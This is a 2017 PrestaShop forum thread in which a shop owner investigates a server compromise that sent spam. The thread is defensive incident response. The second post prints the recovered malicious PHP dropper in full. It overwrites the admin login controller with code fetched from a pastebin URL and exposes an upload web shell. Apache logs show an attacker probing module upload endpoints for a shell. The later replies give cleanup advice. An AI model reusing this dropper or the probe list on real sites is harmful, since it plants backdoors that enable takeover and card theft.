Spam infection in Prestashop files

SamPlissken · June 2, 2017

Hi,

I've been warned by my host (Gandi) one of my server was sending too much mails with php. So they block all mail sends with this method (nice to warn me only when they block and not before…).

I've take a look at the mails logs and i see things.

Before, good to know :

- There is 3 websites on the server, one big, one small and recent, one not used.

- All 3 are Prestashop

Thanks to the logs, i see a file with a lot of request, at the root of the prestashop installation of the 3 websites : leafpw.php

I can see it on 2 of the 3 websites (the small and the not used). I can't find it on the big one but the logs say it exist… Mystery.

It's a file with all the code to be a php mail sender : Leaf PHP Mailer by [leafmailer.pw]

As this file have nothing to do here, it's obviously an infection, but by what ?

- All the core modules are up to date. All from addons.prestashop.com too. I've got a little from CodeCanyon, maybe not up to date. Some modules are commons to the 3 websites : Presta BackUP v2.4.0 - by presta-apps / Presta Vitesse v4.0.2 - by RSI (via CodeCanyon) / SEO Manager v2.5.0 - by onasus.com / Show email alerts v1.5.0 - by 202-ecommerce

- 2 websites have the same theme (the big one and the not used).

- Prestashop is not up to date, 1.6.1.6 for two of them and 1.6.1.7 for the not used website.

So if you have advices or other things, i'm interested.

Except update all i can, i don't know what to do more. I can't find anything on Google about that file in particular.

Thanks !

Edit : I also see the 3 websites have a "wp-log.php" file, added at the root at the same time, it looks like a base64 Wordpress file. The header says "WSO 2.6". It's the name of an old PHP shell.

Edited June 2, 2017 by SamPlissken (see edit history)

SamPlissken · June 2, 2017

Here what i found in the /modules/ folder…

<?php
echo "hacked by Amine";
$sss=array('/','../','../../','../../../','../../../../','../../../../../');
foreach($sss as $pa){
$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");
foreach($p1 as $path){
if (file_exists("$path"))
{
$html = @file_get_contents('https://pastebin.com/raw/43Lwrz3d');
$save=fopen($path,'w');
fwrite($save,$html);
echo "<br> hous <br>";
[spam-filter]}
if($_GET['up']=="hous"){
echo '<center><font color="Red" size="4">';
/// Script Upload By amine \\\
if(isset($_POST['Submit'])){
	$filedir = ""; 
	$maxfile = '2000000';
	$mode = '0644';
	$userfile_name = $_FILES['image']['name'];
	$userfile_tmp = $_FILES['image']['tmp_name'];
	if(isset($_FILES['image']['name'])) {
		$qx = $filedir.$userfile_name;
		@move_uploaded_file($userfile_tmp, $qx);
		@chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload  ==> $userfile_name</b></center></a>";
}
}
else{
echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo "<br> greerz all my friend<br>";
echo '</center></font>';

}
?>

SamPlissken · June 6, 2017

TL;DR

It was a module obviously. If you have the same problem, check Apache logs. Search for multiple GET and POST in a row on /modules/ folder. At the end of the line, when you don't use the tested module, you will see "404". It's like the error 404, it doesn't exist. If you see "200" it's because they found what they searched. Thanks to that, you will know the module(s) they used to hack your server.

If you have recent save, replace all your files. If you don't… well you will have to replace all the core file of prestashop manually, check all the modules folders to see if there is not new one you don't know (it was my case, they add a fake payment module to steal credit card numbers) and replace all the files by the original ones. Don't miss a thing or they will come back. Patch the modules they used to hack you as soon as you can.

Good luck. And goodbye.

Edited June 6, 2017 by SamPlissken (see edit history)

DataKick · June 7, 2017

did you figure out what module, and version, was used as an attack vector?

joseantgv · June 7, 2017

TL;DR

It was a module obviously. If you have the same problem, check Apache logs. Search for multiple GET and POST in a row on /modules/ folder. At the end of the line, when you don't use the tested module, you will see "404". It's like the error 404, it doesn't exist. If you see "200" it's because they found what they searched. Thanks to that, you will know the module(s) they used to hack your server.

If you have recent save, replace all your files. If you don't… well you will have to replace all the core file of prestashop manually, check all the modules folders to see if there is not new one you don't know (it was my case, they add a fake payment module to steal credit card numbers) and replace all the files by the original ones. Don't miss a thing or they will come back. Patch the modules they used to hack you as soon as you can.

Good luck. And goodbye.

Please give more information. Which module was it?

SamPlissken · June 7, 2017

Yes of course, they tested a lot of modules as you can see in the Apache logs :

185.7.214.173 - - [01/Jun/2017:08:58:55 +0000] (0 s) "POST //modules/columnadverts//uploadimage.php HTTP/1.1" 404 87373 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:58:56 +0000] (0 s) "GET ///modules/columnadverts//slides/hous.php?up=shell HTTP/1.1" 404 87401 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:58:56 +0000] (0 s) "POST //modules/soopamobile//uploadimage.php HTTP/1.1" 404 87371 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:58:57 +0000] (0 s) "GET ///modules/soopamobile//slides/hous.php?up=shell HTTP/1.1" 404 87399 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:58:57 +0000] (0 s) "POST //modules/soopabanners//uploadimage.php HTTP/1.1" 404 87372 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:58:58 +0000] (0 s) "GET ///modules/soopabanners//slides/hous.php?up=shell HTTP/1.1" 404 87400 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:00 +0000] (0 s) "POST //modules/vtermslideshow//uploadimage.php HTTP/1.1" 404 87374 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:01 +0000] (0 s) "GET ///modules/vtermslideshow//slides/hous.php?up=shell HTTP/1.1" 404 87402 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:01 +0000] (0 s) "POST //modules/simpleslideshow//uploadimage.php HTTP/1.1" 404 87375 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:02 +0000] (0 s) "GET ///modules/simpleslideshow//slides/hous.php?up=shell HTTP/1.1" 404 87403 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:02 +0000] (0 s) "POST //modules/productpageadverts//uploadimage.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:03 +0000] (0 s) "GET ///modules/productpageadverts//slides/hous.php?up=shell HTTP/1.1" 404 87406 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:03 +0000] (0 s) "POST //modules/homepageadvertise//uploadimage.php HTTP/1.1" 404 87377 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:04 +0000] (0 s) "GET ///modules/homepageadvertise//slides/hous.php?up=shell HTTP/1.1" 404 87405 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:05 +0000] (0 s) "POST //modules/homepageadvertise2//uploadimage.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:06 +0000] (0 s) "GET ///modules/homepageadvertise2//slides/hous.php?up=shell HTTP/1.1" 404 87406 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "POST //modules/jro_homepageadvertise//uploadimage.php HTTP/1.1" 404 87381 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "GET ///modules/jro_homepageadvertise//slides/hous.php?up=shell HTTP/1.1" 404 87409 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:07 +0000] (0 s) "POST //modules/attributewizardpro//file_upload.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:08 +0000] (0 s) "POST //modules/1attributewizardpro/file_upload.php HTTP/1.1" 404 87378 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:09 +0000] (0 s) "POST //modules/attributewizardpro.OLD//file_upload.php HTTP/1.1" 404 87382 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:09 +0000] (0 s) "POST //modules//advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php HTTP/1.1" 404 87512 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:10 +0000] (0 s) "POST //modules/cartabandonmentpro/upload.php HTTP/1.1" 404 87372 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:10 +0000] (0 s) "POST //modules/cartabandonmentproOld/upload.php HTTP/1.1" 404 87375 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:11 +0000] (0 s) "POST //modules//videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload HTTP/1.1" 404 87511 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:12 +0000] (0 s) "GET ///modules//advancedslider/uploads/hous.php.png?up=shell HTTP/1.1" 404 87407 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:12 +0000] (0 s) "GET ///modules//cartabandonmentpro/uploads/hous.php.png?up=shell HTTP/1.1" 404 87411 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:13 +0000] (0 s) "GET ///modules//videostab/uploads/hous.php.mp4?up=shell HTTP/1.1" 404 87402 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:13 +0000] (0 s) "GET ///modules//cartabandonmentproOld/uploads/hous.php.png?up=shell HTTP/1.1" 404 87414 "-" "-"
  185.7.214.173 - - [01/Jun/2017:08:59:14 +0000] (0 s) "POST //modules//wg24themeadministration/wg24_ajax.php HTTP/1.1" 404 87381 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:14 +0000] (0 s) "POST ///modules//wdoptionpanel/wdoptionpanel_ajax.php HTTP/1.1" 404 87381 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:15 +0000] (0 s) "POST //modules///fieldvmegamenu/ajax/upload.php HTTP/1.1" 404 87375 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:15 +0000] (0 s) "POST //modules///pk_flexmenu//ajax/upload.php HTTP/1.1" 200 - "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:16 +0000] (0 s) "POST //modules///pk_vertflexmenu//ajax/upload.php HTTP/1.1" 200 - "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:16 +0000] (0 s) "POST //modules/nvn_export_orders/upload.php HTTP/1.1" 404 87371 "-" "curl/7.49.1"
  185.7.214.173 - - [01/Jun/2017:08:59:18 +0000] (0 s) "POST ///modules/megamenu/uploadify/uploadify.php?id=hous.php HTTP/1.1" 404 87412 "-" "curl/7.49.1"

Most of them are not used by the website, but the two last, pk_flexmenu and pk_vertflexmenu yes.

Both of them was patch some time ago.

selectshop.at · June 8, 2017

These request I have since months....

Perhaps you were infected too, but what I see on my server is that there is no new upload and it is sending spam from Prestashoop contact form. So what I think: bad bots still know how Prestashop contact form is working and are sending from this file the spam, without need to infect a server.

I blocked the contact form for now and will see if this works, because adding a captcha didn't worked as well.

What I did:

Override Contact Controller:

Create a new file ContactController.php and place it in folder overrides/controllers/front/ and add the following code

class ContactController extends ContactControllerCore {
    public function init()
    {
        Tools::redirect('pagenotfound'); // redirect contact page to 404 page
    }
}

In this case you disable the contact form. Customers have only the possibility to contact you by mail. Service contact form is disabled. This snippet is not working with all Prestashop versions. If after deleting cache is not working for you, than simply rename the contact-form of your theme in use to somewhat you want.

BTW: I'm not using send to a friend module and there is also nowhere a link to the contact form (contact module for top navigation as well disabled). The only way to use this form, is to login, so the bad bots simply are using the known link from Prestashop to use it.

ADD: the spam mails I was receiving myself had the following common received from:

Received: from xxxxx.xxxxxx.com (xx.xxx.xx.xxx)  by DOMAINNAME OF PRESTASHOP HOSTED ON MY SERVER with SMTP; 7 Jun 2017 20:05:08 +0200

So the mail was sent by the Prestashop project X on my server.

SamPlissken · June 14, 2017

I haven't any weird mails sent in the phpmail log, so i don't think they do that. For now… Thanks for the tips.

Edited June 14, 2017 by SamPlissken (see edit history)

trevorgilligan · March 2, 2018

i have this : /tools/swift/Swift/Plugin/MailSend.php:160]: To:

is there a way to block users accessing this file? i still need to have it i think as it is the main way PS sends emails?

SamPlissken · March 3, 2018

You have this in the GET/POST list with a code 200 ?

What is your version of PS ? Because it's not a plugin, it's a core file of PS. So it's more serious.

TiaNex Shopping · March 4, 2018

the most important thing you should backup the all data and images and other important files,

the hackers can control your server fully,even they can delete all your data, my server data was deleted for using an worpress theme with bug once,

please check server security configuration,

replace all prestashop system files,you had better upgrade to the latest version of ps 1.6.x or ps 1.7.x

check any Suspicious modules, wish you a good luck!

Spam infection in Prestashop files

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Create an account or sign in to comment

Create an account

Sign in